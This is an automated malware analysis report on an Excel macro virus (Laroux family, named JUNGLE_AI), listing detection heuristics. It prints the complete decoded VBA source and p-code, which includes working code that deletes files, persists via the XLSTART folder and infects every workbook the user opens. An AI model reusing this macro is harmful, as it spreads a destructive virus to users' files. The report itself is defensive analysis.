Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bdd4aad1f56c953c…

MALICIOUS

Office (OLE)

34.0 KB Created: 2000-08-30 21:06:57 Authoring application: Microsoft Excel First seen: 2012-06-28
MD5: e88a6c46c0f7aba16df414fd4fe1a14d SHA-1: 5fe6775d18435e66d218fb49711eb74f92b8b5ac SHA-256: bdd4aad1f56c953cc7e043808a0a44765376c0ba77c03bd1b690876211e0e7d5
236 Risk Score

Heuristics 6

  • ClamAV: Xls.Trojan.Laroux-24 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-24
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
    ChDir Application.StartupPath
  • VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER
    The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
    Matched line in script
    Application.OnSheetActivate = ""
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub auto_close()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7692 bytes
SHA-256: a92c3986b37b8338245f1753128a144ce35a664c0b854873a6bb5494cdc14242
Detection
ClamAV: Xls.Trojan.Laroux-24
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "JUNGLE_AI"

'
Sub auto_open()
Attribute auto_open.VB_Description = "Macro recorded 09/02/1999 by pkgaim"
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n0"
I = Date
P$ = Str(I)
P1$ = Left(P$, 2)
If P1$ = "25" Then
Kill "J*.*"
Else
End If
T = TimeValue(Time)
X$ = Str(T)
M$ = Left(X$, 2)
If M$ = "18" Or M$ = "6:" Or M$ = "06" Then
MsgBox ("VIRUS JUNGLE_AI")
Else
End If
End Sub

Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Application.ScreenUpdating = False
H$ = ActiveWorkbook.Name
P$ = ActiveWorkbook.Path
S$ = Workbooks(H$).Sheets(1).Name
If S$ <> "JUNGLE_AI" Then
Workbooks("PERSONAL.XLS").Sheets("JUNGLE_AI").Copy BEFORE:=Workbooks(H$).Sheets(1)
Workbooks(H$).Sheets("JUNGLE_AI").Visible = False
Else
ST$ = Application.StartupPath
PE$ = Dir(ST$ & "\" & "PERSONAL.XLS")
If PE$ = "PERSONAL.XLS" Then
C = 1
Else
C = 0
End If
Application.ScreenUpdating = False
If C = 1 Then
N$ = ActiveWorkbook.Name
S$ = Workbooks("PERSONAL.XLS").Sheets(1).Name
If S$ <> "JUNGLE_AI" Then
'SAVE AS------
Windows("PERSONAL.XLS").Visible = True
Workbooks(N$).Sheets("JUNGLE_AI").Copy BEFORE:=Workbooks("PERSONAL.XLS").Sheets(1)
Windows("PERSONAL.XLS").Visible = False
'--------------
Else
End If
Else
'SAVE AS NEW------
Application.ScreenUpdating = False
N$ = ActiveWorkbook.Name
Sheets("JUNGLE_AI").Visible = True
Sheets("JUNGLE_AI").Select
CUR$ = CurDir()
With ActiveWorkbook
        .Title = ""
       .Subject = ""
       .Author = ""
       .Keywords = ""
      .Comments = ""
  End With
N1$ = ActiveWorkbook.Name
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(N1$).SaveAs Filename:=Application.StartupPath & "\" & "PERSONAL.XLS", FileFormat:=xlNormal, _
        Password:="", WriteResPassword:="", ReadOnlyRecommended:=False _
        , CreateBackup:=False
        ChDir CUR$

'--------------
End If
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "PERSONAL.XLS!JUNGLE_AI"
End Sub




' Processing file: /opt/analyzer/scan_staging/8caf4792f5c74c26be76c65c7db3d5cf.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/JUNGLE_AI - 5675 bytes
' Line #0:
' Line #1:
' 	QuoteRem 0x0000 0x0000 ""
' Line #2:
' 	FuncDefn (Sub auto_open())
' Line #3:
' 	Ld Date 
' 	St I 
' Line #4:
' 	Ld I 
' 	ArgsLd Str 0x0001 
' 	St P$ 
' Line #5:
' 	Ld P$ 
' 	LitDI2 0x0002 
' 	ArgsLd LBound 0x0002 
' 	St P1$ 
' Line #6:
' 	Ld P1$ 
' 	LitStr 0x0002 "25"
' 	Eq 
' 	IfBlock 
' Line #7:
' 	LitStr 0x0004 "J*.*"
' 	ArgsCall Kill 0x0001 
' Line #8:
' 	ElseBlock 
' Line #9:
' 	EndIfBlock 
' Line #10:
' 	Ld Time 
' 	ArgsLd TimeValue 0x0001 
' 	St T 
' Line #11:
' 	Ld T 
' 	ArgsLd Str 0x0001 
' 	St X$ 
' Line #12:
' 	Ld X$ 
' 	LitDI2 0x0002 
' 	ArgsLd LBound 0x0002 
' 	St M$ 
' Line #13:
' 	Ld M$ 
' 	LitStr 0x0002 "18"
' 	Eq 
' 	Ld M$ 
' 	LitStr 0x0002 "6:"
' 	Eq 
' 	Or 
' 	Ld M$ 
' 	LitStr 0x0002 "06"
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #14:
' 	LitStr 0x000F "VIRUS JUNGLE_AI"
' 	Paren 
' 	ArgsCall MsgBox 0x0001 
' Line #15:
' 	ElseBlock 
' Line #16:
' 	EndIfBlock 
' Line #17:
' 	EndSub 
' Line #18:
' Line #19:
' 	FuncDefn (Sub auto_close())
' Line #20:
' 	OnError (Resume Next) 
' Line #21:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #22:
' 	Ld ActiveWorkbook 
' 	MemLd New 
' 	St H$ 
' Line #23:
' 	Ld ActiveWorkbook 
' 	MemLd Path 
' 	St P$ 
' Line #24:
' 	LitDI2 0x0001 
' 	Ld H$ 
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	MemLd New 
' 	St S$ 
' Line #25:
' 	Ld S$ 
' 	LitStr 0x0009 "JUNGLE_AI"
' 	Ne 
' 	IfBlock 
' Line #26:
' 	LitDI2 0x0001 
' 	Ld H$ 
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	ParamNamed BEFORE 
' 	LitStr 0x0009 "JUNGLE_AI"
' 	LitStr 0x000C "PERSONAL.XLS"
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	ArgsMemCall Copy 0x0001 
' Line #27:
' 	LitVarSpecial (False)
' 	LitStr 0x0009 "JUNGLE_AI"
' 	Ld H$ 
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	MemSt Visible 
' Line #28:
' 	ElseBlock 
' Line #29:
' 	Ld Application 
' 	MemLd StartupPath 
' 	St ST$ 
' Line #30:
' 	Ld ST$ 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	LitStr 0x000C "PERSONAL.XLS"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	St PE$ 
' Line #31:
' 	Ld PE$ 
' 	LitStr 0x000C "PERSONAL.XLS"
' 	Eq 
' 	IfBlock 
' Line #32:
' 	LitDI2 0x0001 
' 	St C 
' Line #33:
' 	ElseBlock 
' Line #34:
' 	LitDI2 0x0000 
' 	St C 
' Line #35:
' 	EndIfBlock 
' Line #36:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #37:
' 	Ld C 
' 	LitDI2 0x0001 
' 	Eq 
' 	IfBlock 
' Line #38:
' 	Ld ActiveWorkbook 
' 	MemLd New 
' 	St N$ 
' Line #39:
' 	LitDI2 0x0001 
' 	LitStr 0x000C "PERSONAL.XLS"
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	MemLd New 
' 	St S$ 
' Line #40:
' 	Ld S$ 
' 	LitStr 0x0009 "JUNGLE_AI"
' 	Ne 
' 	IfBlock 
' Line #41:
' 	QuoteRem 0x0000 0x000D "SAVE AS------"
' Line #42:
' 	LitVarSpecial (True)
' 	LitStr 0x000C "PERSONAL.XLS"
' 	ArgsLd Windows 0x0001 
' 	MemSt Visible 
' Line #43:
' 	LitDI2 0x0001 
' 	LitStr 0x000C "PERSONAL.XLS"
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	ParamNamed BEFORE 
' 	LitStr 0x0009 "JUNGLE_AI"
' 	Ld N$ 
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	ArgsMemCall Copy 0x0001 
' Line #44:
' 	LitVarSpecial (False)
' 	LitStr 0x000C "PERSONAL.XLS"
' 	ArgsLd Windows 0x0001 
' 	MemSt Visible 
' Line #45:
' 	QuoteRem 0x0000 0x000E "--------------"
' Line #46:
' 	ElseBlock 
' Line #47:
' 	EndIfBlock 
' Line #48:
' 	ElseBlock 
' Line #49:
' 	QuoteRem 0x0000 0x0011 "SAVE AS NEW------"
' Line #50:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #51:
' 	Ld ActiveWorkbook 
' 	MemLd New 
' 	St N$ 
' Line #52:
' 	LitVarSpecial (True)
' 	LitStr 0x0009 "JUNGLE_AI"
' 	ArgsLd Sheets 0x0001 
' 	MemSt Visible 
' Line #53:
' 	LitStr 0x0009 "JUNGLE_AI"
' 	ArgsLd Sheets 0x0001 
' 	ArgsMemCall Set 0x0000 
' Line #54:
' 	ArgsLd CurDir 0x0000 
' 	St CUR$ 
' Line #55:
' 	StartWithExpr 
' 	Ld ActiveWorkbook 
' 	With 
' Line #56:
' 	LitStr 0x0000 ""
' 	MemStWith Title 
' Line #57:
' 	LitStr 0x0000 ""
' 	MemStWith Subject 
' Line #58:
' 	LitStr 0x0000 ""
' 	MemStWith Author 
' Line #59:
' 	LitStr 0x0000 ""
' 	MemStWith Keywords 
' Line #60:
' 	LitStr 0x0000 ""
' 	MemStWith Comments 
' Line #61:
' 	EndWith 
' Line #62:
' 	Ld ActiveWorkbook 
' 	MemLd New 
' 	St N1$ 
' Line #63:
' 	Ld Application 
' 	MemLd StartupPath 
' 	ArgsCall ChDir 0x0001 
' Line #64:
' 	LitVarSpecial (False)
' 	Ld ActiveWindow 
' 	MemSt Visible 
' Line #65:
' 	LineCont 0x0008 14 00 08 00 1F 00 08 00
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	LitStr 0x000C "PERSONAL.XLS"
' 	Concat 
' 	ParamNamed Filename 
' 	Ld xlNormal 
' 	ParamNamed FileFormat 
' 	LitStr 0x0000 ""
' 	ParamNamed Password 
' 	LitStr 0x0000 ""
' 	ParamNamed WriteResPassword 
' 	LitVarSpecial (False)
' 	ParamNamed ReadOnlyRecommended 
' 	LitVarSpecial (False)
' 	ParamNamed CreateBackup 
' 	Ld N1$ 
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemCall SaveAs 0x0006 
' Line #66:
' 	Ld CUR$ 
' 	ArgsCall ChDir 0x0001 
' Line #67:
' Line #68:
' 	QuoteRem 0x0000 0x000E "--------------"
' Line #69:
' 	EndIfBlock 
' Line #70:
' 	EndIfBlock 
' Line #71:
' 	LitStr 0x0000 ""
' 	Ld Application 
' 	MemSt OnSheetActivate 
' Line #72:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #73:
' 	LitStr 0x0016 "PERSONAL.XLS!JUNGLE_AI"
' 	Ld Application 
' 	MemSt OnSheetActivate 
' Line #74:
' 	EndSub 
' Line #75:
' Line #76:
' Line #77:

Open this report in the interactive analyzer, or submit your own file for analysis.